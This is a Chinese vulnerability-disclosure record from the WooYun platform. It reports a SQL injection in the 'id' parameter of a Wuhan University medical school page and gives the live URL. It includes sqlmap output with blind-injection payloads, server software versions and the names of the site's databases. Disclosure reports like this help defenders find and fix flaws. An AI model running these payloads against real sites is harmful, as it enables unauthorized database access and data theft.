漏洞概要 关注数(24) 关注此漏洞
>
漏洞详情
披露状态:
2014-04-24: 细节已通知厂商并且等待厂商处理中
2014-04-28: 厂商已经确认,细节仅向厂商公开
2014-05-08: 细节向核心白帽子及相关领域专家公开
2014-05-18: 细节向普通白帽子公开
2014-05-28: 细节向实习白帽子公开
2014-06-08: 细节向公众公开
简要描述:
武汉大学基础医学院sql注入漏洞
详细说明:
注入点:
http://wbm.whu.edu.cn/jcnr.php?mid=18&sid=9&id=958&tag=2
对参数id过滤不严,导致注入
请出sqlmap
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any
)? [y/N] y
sqlmap identified the following injection points with a total of 76 HTTP(s) requ
ests:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: mid=18&sid=9&id=958' AND 4586=4586 AND 'qGqp'='qGqp&tag=2
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: mid=18&sid=9&id=958' AND SLEEP(5) AND 'CHcP'='CHcP&tag=2
---
[11:05:17] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS 6.5
web application technology: PHP 5.3.3, Apache 2.2.15
back-end DBMS: MySQL 5.0.11
available databases [3]:
[*] information_schema
[*] mysql
[*] sizz_jcyxy
漏洞证明:
如上
修复方案:
过滤
版权声明:转载请注明来源 bitcoin@乌云
>
漏洞回应
厂商回应:
危害等级:低
漏洞Rank:1
确认时间:2014-04-28 16:47
厂商回复:
与前一个漏洞http:///bugs/wooyun-2014-提交的是一样的。
最新状态:
暂无